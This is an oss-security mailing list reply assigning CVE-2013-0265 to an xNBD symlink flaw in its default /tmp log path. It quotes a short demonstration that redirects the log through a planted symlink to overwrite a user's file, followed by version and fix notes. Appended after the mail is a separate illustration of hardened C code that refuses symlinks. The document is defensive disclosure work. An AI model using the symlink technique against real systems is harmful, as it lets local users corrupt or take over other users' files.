Date: Wed, 06 Feb 2013 20:39:46 -0700
From: Kurt Seifried <kseifried@...hat.com>
To: oss-security@...ts.openwall.com
CC: Sebastian Pipping <sebastian@...ping.org>
Subject: Re: CVE request: Insecure default log file path in xNBD

On 02/06/2013 09:48 AM, Sebastian Pipping wrote:
> Hello oss-security!
> 
> 
> Target software
> ===============
> 
> xNBD upstream https://bitbucket.org/hirofuchi/xnbd
> 
> Official Debian packages 
> http://packages.debian.org/sid/xnbd-server
> 
> 
> Description
> ===========
> 
> xnbd-server (and xnbd-wrapper in some releases) use /tmp/xnbd.log 
> for logging when parameter --daemonize (and no --logpath FILE) is
> given.
> 
> The file is opened using flags O_WRONLY | O_CREAT | O_APPEND, so
> it is vulnerable to symlink attacks.
> 
> 
> Demonstration
> =============
> 
> Here is an exploitation example:
> 
> $ ln -s "${HOME}"/ATTACK_TARGET /tmp/xnbd.log
> 
> $ touch DISK
> $ truncate --size=$((100*1024**2)) DISK
> 
> $ /usr/sbin/xnbd-server --daemonize --target DISK
> xnbd-server(12462) msg: daemonize enabled
> xnbd-server(12462) msg: cmd target mode
> xnbd-server(12462) msg: disk DISK size 104857600 B (100 MB)
> xnbd-server(12462) msg: xnbd master initialization done
> xnbd-server(12462) msg: logfile /tmp/xnbd.log
> 
> $ ls -l ~/ATTACK_TARGET
> -rw------- 1 user123 user123 653 Feb  1 16:41 /home/user123/ATTACK_TARGET
> 
> 
> Affected versions
> =================
> 
> The latest code in the upstream Mercurial repository is not
> affected since it does not use logging to /tmp/xnbd.log (or any
> default location) any more.
> 
> ----------------------------------------------------------------------
> Version                        Status
> ----------------------------------------------------------------------
> 0.0.x                          not analyzed
> 0.1.0-pre                      VULNERABLE (xnbd-server only)
> 0.1.0-pre-hg20-e75b93a47722-2  VULNERABLE (xnbd-server and -wrapper)
> Mercurial tip                  not vulnerable
> ----------------------------------------------------------------------
> 
> 
> Options for a fix
> =================
> 
> a) Use syslog with --daemonize and no default file location in
> general (i.e. what upstream did)
> 
> b) Use /var/log/xnbd-server.log and /var/log/xnbd-wrapper.log for
> the hard-coded defaults
> 
> c) Replace flag O_APPEND by O_EXCL (secure, but reduces
> functionality)
> 
> The attached patch applies approach (b) to version 
> 0.1.0-pre-hg20-e75b93a47722.
> 
> 
> Best,
> 
> 
> 
> Sebastian

Please use CVE-2013-0265  for this issue.

-- 
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
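As an added illustration of the defensive side of the report (this is not code from xNBD or from either poster), the following shows a hardened way to open a log file at a fixed path: instead of dropping O_APPEND as in option (c), it keeps it and adds O_NOFOLLOW plus a post-open fstat() check, so a planted symlink such as /tmp/xnbd.log is refused with ELOOP rather than followed. The function names open_log_safely and demo_symlink_log are hypothetical, and the temporary directory, victim file and symlink the self-check builds are constructed for the demonstration; none of this replaces the upstream fix of not logging to a world-writable directory at all.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical hardened replacement for opening a default log path.
 * O_NOFOLLOW makes open() fail with ELOOP when the final component is
 * a symlink (the /tmp/xnbd.log -> ~/ATTACK_TARGET case); 0600 keeps
 * the log private. Returns an fd, or -1 with errno set. */
int open_log_safely(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW | O_CLOEXEC, 0600);
    if (fd < 0)
        return -1;
    struct stat st;
    /* Inspect the object actually opened, not the path: accept only a
     * regular file owned by us with exactly one link (no hard links). */
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != geteuid() || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Self-check in a private temp dir: plant a symlink named like the
 * default log pointing at a constructed victim file, then compare the
 * flags from the report with the hardened open. Returns 1 when the
 * naive open followed the link and the hardened one refused (ELOOP). */
int demo_symlink_log(void)
{
    char dir[] = "/tmp/xnbd-demo-XXXXXX", target[PATH_MAX], lnk[PATH_MAX];
    int ok = 0, naive, hardened;
    if (!mkdtemp(dir)) return 0;
    snprintf(target, sizeof target, "%s/ATTACK_TARGET", dir);
    snprintf(lnk, sizeof lnk, "%s/xnbd.log", dir);
    if (close(open(target, O_WRONLY | O_CREAT, 0600)) == 0 && symlink(target, lnk) == 0) {
        naive = open(lnk, O_WRONLY | O_CREAT | O_APPEND, 0600); /* flags as reported */
        hardened = open_log_safely(lnk);
        ok = naive >= 0 && hardened < 0 && errno == ELOOP;
        if (naive >= 0) close(naive);
    }
    unlink(lnk); unlink(target); rmdir(dir);
    return ok;
}
```

The fstat() check matters because O_NOFOLLOW only covers the last path component; a symlinked parent directory or a hard link to the victim file would otherwise still get through.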

